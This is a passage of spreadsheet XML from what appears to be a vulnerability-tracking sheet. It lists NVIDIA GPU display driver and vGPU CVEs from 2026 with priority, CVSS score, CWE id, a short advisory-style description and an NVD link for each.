          <t>CWE-404</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user can cause improper release of memory resources, leaving a mapping accessible after the underlying memory is reused. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47491</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47493</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU software for Windows and Linux contains a vulnerability in the GPU kernel driver where a guest may access privileged host GPU resources for which it is not authorized. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47493</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47494</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability where a user might be able to cause a format string issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47494</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47495</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager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143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47495</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47497</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Virtual GPU Manager contains a vulnerability in the GPU System Processor (GSP) tracing component where a guest VM user may cause improper access by sending crafted data through a shared buffer. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47497</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47498</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Manager contains a vulnerability in the GPU System Processor (GSP) plugin where a guest VM user may cause an out-of-bounds write by sending a specially crafted RPC message. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47498</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47499</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Windows and Linux contains a vulnerability in the kernel mode layer where a guest could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47499</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47500</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where improper cleanup of reference counts during error paths could lead to a use-after-free condition. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47500</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47501</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause an out-of-bounds write by supplying mismatched memory buffers during event buffer setup. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47501</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47502</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Windows and Linux contains a vulnerability in the kernel mode layer, where a guest user could cause an integer overflow leading to memory corruption. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47502</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47503</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where a guest VM user may cause an out-of-bounds write by sending a crafted RPC message with invalid performance state list size parameters. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47503</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47504</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Linux GPU Display Driver contains a vulnerability in the NGX updater where an outdated embedded cryptographic library is susceptible to type confusion. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, or data tampering.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47504</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47505</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer where an attacker could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, denial of service, or escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47505</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47507</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an out-of-bounds array access. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47507</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47508</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an incorrect conversion between numeric types. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47508</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47510</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an integer overflow leading to an out-of-bounds write to GPU memory. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47510</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47511</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47511</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47512</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
